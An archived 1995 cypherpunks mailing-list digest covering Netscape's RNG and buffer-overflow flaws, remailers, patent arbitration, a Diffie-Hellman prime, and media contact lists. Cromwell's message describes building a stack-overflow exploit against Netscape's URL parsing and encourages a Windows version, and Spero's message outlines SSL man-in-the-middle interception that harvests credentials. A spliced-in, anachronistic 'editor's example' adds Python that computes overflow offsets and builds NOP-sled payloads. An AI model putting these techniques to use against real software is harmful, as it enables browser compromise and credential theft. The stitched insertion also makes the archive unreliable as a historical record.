>Content-Type: text/plain; charset=us-ascii
>
>  Here is the press release we put out this morning regarding the fix
>for RNG seed and stack overflow problems.

Do the new versions use PGP's randseed.bin? If Netscape even only looks at data used to keep PGP secure, Netscape will be banned from my computer and every computer I am responsible for. -- For good.

- --
- -- Lucky Green  PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGduUCoZzwIn1bdtAQFEgwGA3265JY1cahyqqd2VEe+1RPXI96DQBPRV
r1EWdjxzjgXvxplLMagh9yWOPBq9OKRX
=F3qb
-----END PGP SIGNATURE-----

From jeffb at sware.com Tue Sep 26 06:16:11 1995
From: jeffb at sware.com (Jeff Barber)
Date: Tue, 26 Sep 95 06:16:11 PDT
Subject: truerand
Message-ID: <9509261314.AA00248@wombat.sware.com>

Could someone please send me a copy of the truerand code Matt Blaze posted yesterday? I inadvertently deleted the message and Todd's Cpunk archives seem to have shut down about a month ago.

Many thanks.
-- Jeff

From shamrock at netcom.com Tue Sep 26 06:16:16 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:16:16 PDT
Subject: Golden Coy Freeh
Message-ID: <199509260246.WAA20098@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article , paulp at CERF.NET (Paul Phillips) wrote:

>On Mon, 25 Sep 1995, John Young wrote:
[...]
>> If the head of the F.B.I. acknowledged that his agency was
>> powerless to crack a cryptography program like Pretty Good
>> Privacy, the stampede for that software on the Internet
>> would make the run on Windows 95 look puny.
>
>That's a bizarre and naive statement. Is there anyone that thinks the
>spread of strong crypto has been less than rapid only because people are
>afraid it won't protect them against the government?

Um, sorry, no. The general public doesn't use PGP. If the FBI director admitted that using PGP is safe even against the FBI, the general public just might become aware of it. Perhaps the statement isn't so naive after all.

- --
- -- Lucky Green  PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdpbioZzwIn1bdtAQG5zwGAmmSuPLdrDV9rBAUmJFuywUC4x1KgeVqP
HiD9C8pP+L5xkZw8pyH8xhwfKPZeKOHb
=w1IS
-----END PGP SIGNATURE-----

From sameer at c2.org Tue Sep 26 06:17:02 1995
From: sameer at c2.org (sameer)
Date: Tue, 26 Sep 95 06:17:02 PDT
Subject: getting netscape to support the remailers
Message-ID: <199509260239.TAA14898@infinity.c2.org>

I started thinking about what it would take to get Netscape to support sending mail through the remailers, after having read the S/MIME specs which Netscape 2.0 is apparently going to support. Perhaps with enough browbeating Netscape 3.0 will support the remailers.
I think that in order to get netscape to support the remailers the remailers will have to:

A) Support S/MIME
B) Have a documented protocol, MIME-related

Did Ray Cromwell do some work towards MIMEifying the remailers? My impression of his work back when he posted was that it trusted the remailers too much, but perhaps my memory is flawed-- in any case his work may be helpful towards developing a remailer standard, which could then help get support incorporated into MIME agents.

I will begin work on a preliminary specification, and post my results. I figure MIME remailers would allow for:

1) Transparent reply-blocks

Someone could have a multipart mime message where one of the parts is Content-Type: reply-block and the MUA would see that and understand to send replies with that reply block to the remailers.

I will be posting more as I work out the details. I welcome comments, suggestions, etc., as I figure that my initial specification will require much improvement.

--
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")		sameer at c2.org

From JonathanZ at consensus.com Tue Sep 26 06:17:53 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Tue, 26 Sep 95 06:17:53 PDT
Subject: RSA/Cylink arbitration agreement on-line
Message-ID:

At 7:13 AM 9/25/95, Brian A. LaMacchia wrote:
>[I haven't seen this mentioned yet on the list...]
>
>Cylink has been kind enough to put a copy of the arbitration panel's
>decision on their web page. Cylink's home page is www.cylink.com. The
>URL for the actual agreement is:
>
> http://www.cylink.com/arbtrn_1.html
>
>Spin doctors aside, it doesn't look like either company gained much over
>the other. I'm not an attorney, but the way I read the agreement RSAREF
>can continue to be used without violating the Stanford patents.
>RSA DSI
>cannot *sublicense* the Stanford patents to third parties, but can *sell
>code* that practices the methods claimed in the Stanford patents. That
>code can then be incorporated into other products, which is exactly what
>PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which
>is covered by the RSAREF license agreement).
>

As far as I can tell, that seems to sum it up. In addition, RSA agrees in all their contracts to indemnify the licensee regarding RSA's rights to assign the various technologies. When I called to speak to them, they reiterated their stance. Since we are going to be handling RSAREF, the validity of RSAREF licenses was of some importance. Having gone through the arbitration ruling things seem to be on track. I'll post more of this to the RSAREF Announce list for folk.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                  Consensus Development Corporation..
..                                 1563 Solano Ave, #355..
..                                 Berkeley, CA 94707-2116..
..                                 o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:            Consensus Home Page ..

From rjc at clark.net Tue Sep 26 06:21:38 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 26 Sep 95 06:21:38 PDT
Subject: Decompiling Netscape
In-Reply-To:
Message-ID: <199509260153.VAA11436@clark.net>

Doug,

I've managed to find a URL which can place an arbitrary value in the PC register without disassembly. What I did was make a URL

  abcdefg....ABCDEFG....ZAaBbCcDd.....ZzAAaaBBbbCCcc.....ZZzz

then, when Netscape coredumped and the PC gets modified, I look at the PC, say 0x54535251, and see that it is QRST, so I place the PC register there. Now all I need is some 386 code under BSDI2.0 to do an execve. I just wrote a simple execve in C, compiled it, and stole the appropriate magic kernel library invocation sequence.
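[Editor's added example. The following is not part of Ray's message and not his code, nor Netscape's; it writes out the offset-finding trick he describes above, the sled-and-guessed-address layout and the "no characters that stop the hostname parse" constraint he lists next, and the address-uncertainty objection Matthew Sheppard raises further down the thread. `ray_pattern()` reproduces the string he describes; `pattern_create()` is the longer Metasploit-style cyclic pattern for buffers past 208 bytes. The bad-byte set, the 0xefbf... stack addresses and the two-byte int3 "shellcode" are placeholders chosen for this example, so nothing here is a working exploit.]

```python
# Editor's added example: cyclic-pattern offset finding and a sled payload
# for a stack overflow of the kind discussed in this thread. Not the poster's
# code; the shellcode and addresses below are placeholders, not a real exploit.
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def ray_pattern() -> bytes:
    """The pattern Ray describes: a-z, A-Z, AaBb..Zz, then AAaaBBbb..ZZzz (208 bytes)."""
    pairs = "".join(u + lo for u, lo in zip(ascii_uppercase, ascii_lowercase))
    quads = "".join(u * 2 + lo * 2 for u, lo in zip(ascii_uppercase, ascii_lowercase))
    return (ascii_lowercase + ascii_uppercase + pairs + quads).encode()


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern 'Aa0Aa1...': every 3-byte window is unique
    for the first 26*26*10*3 = 20280 bytes, so any 4-byte slice maps to one offset."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern would repeat; offsets would be ambiguous")
    out = bytearray()
    for u in ascii_uppercase:
        for lo in ascii_lowercase:
            for d in digits:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, pc: int) -> int:
    """Byte offset in `pattern` that landed in the saved-PC slot, or -1.
    x86 is little-endian, so PC 0x54535251 means the bytes b'QRST' in memory."""
    return pattern.find(struct.pack("<I", pc))


# Assumed set of bytes that end the hostname part of a URL (not from the post).
HOSTNAME_BAD_BYTES = b"\x00/:?# \t\r\n"


def build_payload(offset: int, ret_guess: int, sled_len: int, shellcode: bytes) -> bytes:
    """Ray's layout: filler up to the saved PC, the guessed return address,
    a NOP sled (0x90), then the code. The guess only has to land in the sled."""
    return b"A" * offset + struct.pack("<I", ret_guess) + b"\x90" * sled_len + shellcode


def find_badchar(payload: bytes, bad: bytes = HOSTNAME_BAD_BYTES) -> int:
    """Index of the first byte that would cut the hostname short, or -1 if clean."""
    for i, b in enumerate(payload):
        if b in bad:
            return i
    return -1


def sled_hits(ret_guess: int, real_sled_start: int, sled_len: int) -> bool:
    """Sheppard's objection in code: the sled's real address moves with stack
    depth; the guess works only if it falls anywhere inside the sled."""
    return real_sled_start <= ret_guess < real_sled_start + sled_len


if __name__ == "__main__":
    pat = ray_pattern()
    off = pattern_offset(pat, 0x54535251)           # Ray's observed PC -> offset 42
    print("saved PC sits at offset", off)
    # Hypothetical BSDI/x86 stack guesses; 0xefbf2f00 carries 0x00 and '/' and is rejected.
    for guess in (0xEFBF2F00, 0xEFBFEE90):
        p = build_payload(off, guess, 256, b"\xcc\xcc")   # int3 placeholders, not execve
        print(hex(guess), "first bad byte at", find_badchar(p))
    print("hits sled if real start is 0xefbfee00:", sled_hits(0xEFBFEE90, 0xEFBFEE00, 256))
```

Note that a sled only widens the target; it does not remove the guess. For a browser whose stack depth depends on how many documents deep the user is, a practitioner would either spray several guesses across separate requests or pick the single popular state Sheppard mentions (the first URL fetched).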
What I need to do now is 1) find out the approximate address of the stack pointer, 2) generate some code that has a whole lotta NOPs, followed by the execve sequence, and finally, preface all that by a PC value that will hopefully land somewhere inside that field of NOPs on the stack. And all this has to be done without using any characters which will stop netscape from reading in more pieces of the domain string.

You might be able to use the same techniques to whip up a quick exploit on your systems. By far, the best exploits will be on the Mac and Windows (especially), because those make up the majority of people using Netscape. Create an exploit on Windows, and stun the world. ;-)

-Ray

From lharrison at mhv.net Tue Sep 26 06:22:50 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 26 Sep 95 06:22:50 PDT
Subject: List of US representitives
Message-ID: <9509260213.AA29843@mhv.net>

-----BEGIN PGP SIGNED MESSAGE-----

At 01:37 PM 9/25/95 EST, Brian Gorka wrote:
>Someone posted a list of US reps awhile back... Can someone forward me a copy?
>Thanks.

Brian,

Here's the list you requested. Linda Thompson (lindat at iquest.net) posted this in August, 1995.
Regards - Lynne

++++++++++

senator at boxer.senate.gov, senator_brown at brown.senate.gov, sen_dodd at dodd.senate.gov,
senator_lieberman at lieberman.senate.gov, joe_biden at biden.senate.gov,
senator_coverdell at coverdell.senate.gov, tom_harkin at harkin.senate.gov,
chuck_grassley at grassley.senate.gov, larry_craig at craig.senate.gov,
dirk_kempthorne at kempthorne.senate.gov, senator at simon.senate.gov,
senator at moseley-braun.senate.gov, wendell_ford at ford.senate.gov,
senator at breaux.senate.gov, senator at johnston.senate.gov, senator at kennedy.senate.gov,
john_kerry at kerry.senate.gov, senator at mikulski.senate.gov, senator at levin.senate.gov,
mail_grams at grams.senate.gov, senator at wellstone.senate.gov,
john_ashcroft at ashcroft.senate.gov, max at baucus.senate.gov, conrad_burns at burns.senate.gov,
bob at kerrey.senate.gov, mailbox at gregg.senate.gov, opinion at smith.senate.gov,
senator at bradley.senate.gov, senator_Bingaman at bingaman.senate.gov,
senator_domenici at domenici.senate.gov, senator_reid at reid.senate.gov,
senator_dewine at dewine.senate.gov, nickles at rpc.senate.gov, lugar at iquest.net,
senator_chafee at chafee.senate.gov, senator at hollings.senate.gov,
tom_daschle at daschle.senate.gov, larry_pressler at pressler.senate.gov,
senator_frist at frist.senate.gov, senator at hutchison.senate.gov,
senator_robb at robb.senate.gov, senator at warner.senate.gov, senator_leahy at leahy.senate.gov,
vermont at jeffords.senate.gov, senator_Gorton at gorton.senate.gov,
russell_feingold at feingold.senate.gov, senator at rockefeller.senate.gov,

everett at hr.house.gov, budmail at hr.house.gov, sbachus at hr.house.gov, jdickey at hr.house.gov,
edpastor at hr.house.gov, dcaucus at hr.house.gov, woolsey at hr.house.gov, gmiller at hr.house.gov,
sfnancy at hr.house.gov, talk2tom at hr.house.gov, petemail at hr.house.gov, annagram at hr.house.gov,
tellnorm at hr.house.gov, zoegram at hr.house.gov, samfarr at hr.house.gov, george at hr.house.gov,
andrea22 at hr.house.gov, tellbuck at hr.house.gov, jharman at hr.house.gov, tucker96 at hr.house.gov,
housesst at hr.house.gov, rpackard at hr.house.gov, skaggs at hr.house.gov, schaefer at hr.house.gov,
bozrah at hr.house.gov, cshays at hr.house.gov, delaware at hr.house.gov, kthurman at hr.house.gov,
cstearns at hr.house.gov, canady at hr.house.gov, pdeutsch at hr.house.gov, hastings at hr.house.gov,
jlinder at hr.house.gov, georgia6 at hr.house.gov, saxby at hr.house.gov, ga10 at hr.house.gov,
runderwo at hr.house.gov, brush at hr.house.gov, luisg at hr.house.gov, hfawell at hr.house.gov,
dhastert at hr.house.gov, durbin at hr.house.gov, johnhost at hr.house.gov, emailpat at hr.house.gov,
edky01 at hr.house.gov, mward2 at hr.house.gov, bunning4 at hr.house.gov, torkma06 at hr.house.gov,
jmoakley at hr.house.gov, cardin at hr.house.gov, tellhoek at hr.house.gov, congehlr at hr.house.gov,
davecamp at hr.house.gov, repsmith at hr.house.gov, chrysler at hr.house.gov, lrivers at hr.house.gov,
jconyers at hr.house.gov, gil at hr.house.gov, dminge at hr.house.gov, mn03 at hr.house.gov,
vento at hr.house.gov, tellbill at hr.house.gov, tocollin at hr.house.gov, oberstar at hr.house.gov,
goldsmit at iquest.net, talentmo at hr.house.gov, demldr at hr.house.gov, bemerson at hr.house.gov,
bthompson at hr.house.gov, funnc02 at hr.house.gov, thechief at hr.house.gov, mail2nc5 at hr.house.gov,
crose at hr.house.gov, myrick at hr.house.gov, chtaylor at hr.house.gov, melmail at hr.house.gov,
epomeroy at hr.house.gov, zeliff at hr.house.gov, franksnj at hr.house.gov, dzimmer at hr.house.gov,
mpforbes at hr.house.gov, lazio at hr.house.gov, tmanton at hr.house.gov, molinari at hr.house.gov,
rangel at hr.house.gov, jserrano at hr.house.gov, engeline at hr.house.gov, boehlert at hr.house.gov,
bpaxon at hr.house.gov, portmail at hr.house.gov, hokemail at hr.house.gov, istook at hr.house.gov,
furseor1 at hr.house.gov, pdefazio at hr.house.gov, murtha at hr.house.gov, jonfox at hr.house.gov,
mchale at hr.house.gov, pa16 at hr.house.gov, jspratt at hr.house.gov, cwilson at hr.house.gov,
samtx03 at hr.house.gov, barton06 at hr.house.gov, doggett at hr.house.gov, frost at hr.house.gov,
ggreen at hr.house.gov, enidutah at hr.house.gov, ortonut3 at hr.house.gov, opickett at hr.house.gov,
talk2bob at hr.house.gov, ninthnet at hr.house.gov, bsanders at igc.apc.org, repwhite at hr.house.gov,
asklinda at hr.house.gov, dunnwa08 at hr.house.gov, rtate at hr.house.gov, mneumann at hr.house.gov,
badger02 at hr.house.gov, roth08 at hr.house.gov, commerce at hr.house.gov, slabmgnt at hr.house.gov,
resource at hr.house.gov, housesst at hr.house.gov, smbizcom at hr.house.gov

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGdiOj5A4+Z4Wnt9AQH5dwP+ItAzI/4EpqKaO34oKpOyI2QFcX8o5IYf
vqAWC9u4D/cEuWx8hmVIe+r5iFmgbx3jIW2fPtzeu9G8VnPu5YrefzQGVR1UQsNz
ockVde+WJb96M+To8u2141zMkHSr3ZurHjWk+K6Ft4c1ek0eRkYchUwEnvfigwZb
DQCDjR+mb84=
=az85
-----END PGP SIGNATURE-----

********************************************************************
Lynne L. Harrison, Esq.
34 Cannon Street
Poughkeepsie, New York 12601
(914) 454-8130
E-Mail: lharrison at mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
 - Kahlil Gibran from "The Prophet"
********************************************************************

From dlv at bwalk.dm.com Tue Sep 26 06:24:38 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 26 Sep 95 06:24:38 PDT
Subject: Net KiddiePorn Hype on TV
In-Reply-To:
Message-ID: <9cg1BD6w165w@bwalk.dm.com>

jkandt at mail.wsdot.wa.gov (Jeff Kandt) writes:

> I heard that piece too. Sounded like a total PR move for Curtis
> Slewah(sp?) and his Guardian Angels. They certainly didn't sound like they
> knew what they were doing, technically speaking.

Curtis Sliwa is rather notorious in NYC politics. He used to have a talk show with his wife Lisa in WABC; not sure what happened to it after they got divorced.
He admitted staging a physical attack on himself to increase his popularity; after the attack he claimed the cops did it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From khijol!erc at cygnus.com Tue Sep 26 06:29:20 1995
From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin])
Date: Tue, 26 Sep 95 06:29:20 PDT
Subject: "random" number seeds vs. Netscape
In-Reply-To:
Message-ID: <199509260036.TAA21140@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

> Very interesting. I wouldn't be too sure that a transmitted signal at a
> single frequency is the only signal that an opponent could use to bias your
> random numbers. How do you "test for randomness". I think that signal to
> noise arguments, phrased in terms of entropy, can protect you against
> unknown and unwan1ted signal. (Ironically you want a very low signal to
> noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you
> need n bits and run them thru MD5. Here S is the signal strength of the
> maximum plausible unwanted signal, and N is the noise of the diode.

I tested for randomness by looking at the distribution of random numbers over the range I was drawing random numbers from. If it didn't look random, it wasn't ;)

- --
Ed Carp, N7EKG			Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGdK9SS9AwzY9LDxAQHdVQQAjwez1skYK8eaClLEq7mCb0V8aPERe/58
3AxH5W9JuaJqWD/nArVLW7HAY4tOM5Sjb2IHZsK3wF29Bd3A/TI0GM5Y1y2vOF9P
rNlkM2schf2nfsx7BdfqxWYELxCRUUeZTIagxwWSNMmCbMS22bMiYguVnxHqrjj1
g9n1fCzVDHA=
=tpBm
-----END PGP SIGNATURE-----

From Matthew.Sheppard at Comp.VUW.AC.NZ Tue Sep 26 06:29:22 1995
From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard)
Date: Tue, 26 Sep 95 06:29:22 PDT
Subject: WSJ on Netscape Hole 3
In-Reply-To: <199509252300.QAA29812@infinity.c2.org>
Message-ID: <199509260102.NAA09663@bats.comp.vuw.ac.nz>

The shadowy figure took form and announced "I am sameer and I say ...
> > On Mon, 25 Sep 1995, John Young wrote:
> >
> > > The Wall Street Journal, September 25, 1995, p. B12.
> >
> > > Marc Andreessen, vice president of technology at Netscape,
> > > said the company will issue fixes for the recent glitches
> > > later this week. He added that it's unclear whether
> > > anything other than temporarily crashing a user's computer
> > > could result from the recent flaw.
> >
> > Oh Marc, you didn't really want to say that, did you?
> >
> > -Thomas
>
> 	He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.

It isn't simple, you need to know the absolute address of where the supplied code will be and alter the return address on the stack to that address.

With NCSA HTTPD 1.3 and with fingerd (re internet worm) the stack was always in a known state when the buffer overwrite occurred, thus the absolute address of attacking code is static and placed at the correct stack location.
With Netscape 1.1 the state of the stack is much more dynamic, in particular the user can be viewing documents at an arbitrary depth in the "web tree"; each recursion will increase the stack pointer (or decrease with some architectures). There is no way of knowing for certain where your code will end up and thus no way to reliably alter the return address on the stack to execute your arbitrary code.

You could always gamble on popular states, like when the first URL is fetched by the browser. Also you could direct execution to any routine in the netscape binary (with unknown arguments). The most detrimental offhand would be deleting the bookmarks file (whoopee).

And with Netscape 2 coming RSN I wouldn't waste too much time.

-- |~ |~ |~ o| o| ('< o| ,',) ''<< ---""---

From karn at qualcomm.com Tue Sep 26 06:31:45 1995
From: karn at qualcomm.com (Phil Karn)
Date: Tue, 26 Sep 95 06:31:45 PDT
Subject: Primality verification needed
Message-ID: <199509260050.RAA14732@servo.qualcomm.com>

Hi. I've generated a 2047-bit "strong" prime number that I would like to use with Diffie-Hellman key exchange. I assert that not only is this number 'p' prime, but so is (p-1)/2. I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version 1.3.2 to test this number. This function uses the Miller-Rabin primality test. However, to increase my confidence that this number really is a strong prime, I'd like to ask others to confirm it with other tests.
Here's the number in hex:

72a925f760b2f954ed287f1b0953f3e6aef92e456172f9fe86fdd8822241b9c9788fbc289982743e
fbcd2ccf062b242d7a567ba8bbb40d79bca7b8e0b6c05f835a5b938d985816bc648985adcff5402a
a76756b36c845a840a1d059ce02707e19cf47af0b5a882f32315c19d1b86a56c5389c5e9bee16b65
fde7b1a8d74a7675de9b707d4c5a4633c0290c95ff30a605aeb7ae864ff48370f13cf01d49adb9f2
3d19a439f753ee7703cf342d87f431105c843c78ca4df639931f3458fae8a94d1687e99a76ed99d0
ba87189f42fd31ad8262c54a8cf5914ae6c28c540d714a5f6087a171fb74f4814c6f968d72386ef3
56a05180c3bec7ddd5ef6fe76b1f717b

The generator, g, for this prime is 2.

Thanks!

Phil Karn

From ses at tipper.oit.unc.edu Tue Sep 26 06:32:16 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Tue, 26 Sep 95 06:32:16 PDT
Subject: SSL Man-in-the-middle
In-Reply-To: <447bes$7ai@tera.mcom.com>
Message-ID:

Jeff - there are two ways to get the document information right (or wrong).

The first approach is to use redirects to point the client back at the original server once you've grabbed whatever info you want for the request. Redirects from https -> https don't trigger a warning box. You may need to rewrite the URL slightly to prevent loop detection (stick a . at the end of the hostname, or add a port, etc.).

The second approach is to only intercept requests for inline images. These don't affect the document information window, and give you full access to the whole request, which may have user authentication information associated with it, in the URL or in header fields. Image requests can be identified reliably through simple traffic analysis.

Simon

Contract with America - Explained!			|Phone: +44-81-500-3000
Contract: verb						|Mail: ses at unc.edu
1) To shrink or reduce in size - the economy contracted	+-----------------------
2) To become infected -My baby contracted pneumonia when they stopped my welfare

From kelli at zeus.towson.edu Tue Sep 26 06:34:19 1995
From: kelli at zeus.towson.edu (K. M. Ellis)
Date: Tue, 26 Sep 95 06:34:19 PDT
Subject: Fax Number List
Message-ID:

I promised last week that I would send this out when the idea of a blanket-fax-campaign for a c-punks press release was being discussed. Sorry it took me so long to get around to it, but here it is. I was mistaken in my original posting: it includes neither the Fox Network _nor_ the Eye on America show, but I'm sure we'll find those numbers somewhere. I got it from the Iron Feather Journal, volume 14. I have no reason to believe that any of these numbers are incorrect, but some of them may have changed.

Also: personal apologies to anyone who considers this to be noise. Please restrict all flames to private e-mail.

Anybody wanna fax Ted Turner? :)

ABC 20/20                NY                  1-212-456-2969
ABC World News           NY                  1-212-456-4968
Ann Arbor News           Ann Arbor, MI       1-313-994-6879
AP                       Los Angeles         1-213-748-1200
AP                       San Diego           1-619-291-2098
AP                       Washington, D.C.    1-202-828-6422
AP (Broadcast)           Washington, D.C.    1-202-955-7367
Associated Press         Boston, MA          1-617-338-8215
Associated Press         Los Angeles         1-213-748-9836  Steve Loeper
Associated Press         Phoenix, AZ         1-602-254-9573  Assignment Editor
Associated Press         San Francisco       1-415-552-9430  Bill Schiffmann
Associated Press MN      Minneapolis, MN     1-612-332-4245
Boston Phoenix           Boston, MA          1-617-536-1463
Boulder Daily Camera     Boulder, CO         1-303-442-1508
C-SPAN                   Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS                      NY                  1-212-975-1519
CBS                      Washington, D.C.    1-202-659-2586
CBS (Radio)              Washington, D.C.    1-202-659-5578
CBS Eve News             NY                  1-212-975-2115
CBS Morning              Washington, D.C.    1-202-331-1765
CBS News                 Los Angeles         1-213-651-0285  Jennifer Siebens
CBS News                 San Francisco       1-415-362-7417  John Blackstone
CBS TV                   Los Angeles         1-213-651-0321
CBS TV                   San Francisco       1-415-362-7417
Ch. Sci Monitor          Washington, D.C.    1-202-223-3476
Chicago Sun-Times        Chicago, IL         1-312-321-3084
Chicago Tribune          Chicago, IL         1-312-222-3143
CNN                      Los Angeles         1-213-460-5081
CNN                      San Francisco       1-415-398-4049
CNN President            Atlanta, GA         1-404-827-1575  Ted Turner
Coloradoan               Fort Collins, CO    1-303-224-7726
Denver Post              Denver, CO          1-303-820-1369
Der Spiegel              Hollywood, CA       1-213-851-9867  Frances Schoenberg
Detroit News             Detroit, MI         1-313-222-2335
Gannett                  Washington, D.C.    1-202-243-0190
Gannett News Service     Sacramento, CA      1-916-446-7326  Becky Lavally
Good Mng America         Washington, D.C.    1-202-887-7685
Mother Jones             San Francisco, CA   1-415-863-5136  Douglas Foster
NBC                      Washington, D.C.    1-202-362-2009
NBC (Radio)              Washington, D.C.    1-703-685-2197
NBC News                 Burbank, CA         1-818-840-4275  Heather Allan
NBC News                 New York, NY        1-212-956-2140
NBC News                 San Francisco, CA   1-415-441-2823  David Burrington
NBC News President       New York, NY        1-212-315-4037  Michael Gartner
NBC TV                   Los Angeles         1-818-840-4275
NBC TV                   San Francisco, CA   1-415-441-2823
Newsweek                 Los Angeles, CA     1-213-444-5287  Managing Editor
Newsweek                 New York, NY        1-212-421-4993  Jonathan Alter
Newsweek                 Washington, D.C.    1-202-783-6512
NPR Radio                San Francisco, CA   1-415-553-2241
NY Times                 New York, NY        1-212-556-4603
PBS                      Alexandria, VA      1-703-739-0775
Pulse!                   West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition        Washington, D.C.    1-202-728-1192
Reuters                  Los Angeles         1-213-622-0056
Rocky Mountain News      Denver, CO          1-303-892-5499
Scripps Howard           Washington, D.C.    1-202-408-8116
Shareware Magazine       Sunnyvale, CA       1-408-730-2107  Tracy Stephenson
Time                     San Francisco, CA   1-415-434-5209  Paul Witteman
Time Magazine            NY                  1-212-522-0451
UPI                      Boston, MA          1-617-338-9774  Barry Fly
UPI                      Los Angeles         1-213-620-1237
UPI                      San Francisco       1-415-552-3585  Bill Bucy
UPI                      Seattle, WA         1-206-283-0408  Penny Spar
UPI                      Washington, D.C.    1-202-789-2362
UPI (Radio)              Washington, D.C.    1-202-842-3625
US News & Wrld Rprt      Washington, D.C.    1-202-955-2713
USA Today                Washington, D.C.    1-202-276-5527
Utne Reader              Minneapolis, MN     1-612-338-6043
Whole Earth Review       Sausalito, CA       1-415-332-2416  Kevin Kelly

kelli at zeus.towson.edu
Geek Code v3.0		http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)> PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.	Towson State University		DSOC at zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ."
 -Richard Adams

From jirib at sweeney.cs.monash.edu.au Tue Sep 26 06:37:42 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Tue, 26 Sep 95 06:37:42 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To:
Message-ID: <199509261336.XAA20707@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello craig at passport.ca (Craig Hubley) and perry at piermont.com and cypherpunks at toad.com

craig at passport.ca (Craig Hubley) writes:
...
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
...
> True enough, but there are sometimes rough consenses on technical questions,
...

Consenses or consensuses or consenci? Maybe consensen? Consensix?

> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> for commercial applications, and that Netscape seems to have taken less
> than due care to choose an appropriate random seed for its session keys."

Careful there, that comma is rather small to be between two completely unrelated statements. You might want a semicolon, full stop or better yet a paragraph break.

If you want another to make a round number, how about something about GAK and a-screwed keys? I think there's a consensus on that one... (definitely stronger than on the Netscape point, anyway)

Good luck, anyway!

Jiri
- --
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGgB5SxV6mvvBgf5AQHvuAQAihd2DyYnbhwQL2lHcs0qhnmS7U5pguGu
YLCPszybtprsOJ818K5RpFcBFkg+n8TALMONovyt/IDQjo3LLWvx/XO+MrbeLdLU
EpgOo1O73z2/GpcCmmGaamzt9+0+lXc05Xnepl3iwihgQtWgG+XUyLcASKk28/SJ
JvwzwIbttc4=
=L7Vi
-----END PGP SIGNATURE-----

From perry at piermont.com Tue Sep 26 06:56:14 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 26 Sep 95 06:56:14 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To:
Message-ID: <199509261355.JAA16305@frankenstein.piermont.com>

Craig Hubley writes:
> > we've gone over this many times. We aren't a group. We're a mailing
> > list. We've got a diversity of opinions, and we have no organization
> > -- nor do we want one.
>
> True enough, but there are sometimes rough consenses on technical questions,
> and if it were clear enough that these were collective in nature and not to
> be ascribed to any particular person, e.g.:
>
> "Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> for commercial applications, and that Netscape seems to have taken less
> than due care to choose an appropriate random seed for its session keys."

Why bother? Why not just say, if asked, that most reasonable technical experts believe 40 bits are too small, or show them by a technical demonstration as we already have?

There is this widespread and wholly misplaced affection for "cypherpunks". We aren't a company or an organization. This is a mailing list, and occasionally a seminar series in places like NoCal. It isn't a "group".

Perry

From perry at piermont.com Tue Sep 26 07:12:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 26 Sep 95 07:12:10 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID: <199509261411.KAA16336@frankenstein.piermont.com>

Craig Hubley writes:
> I'd volunteer to be 'spokespunk',

You don't speak for me, sir, and never will. I do my own talking to the press.

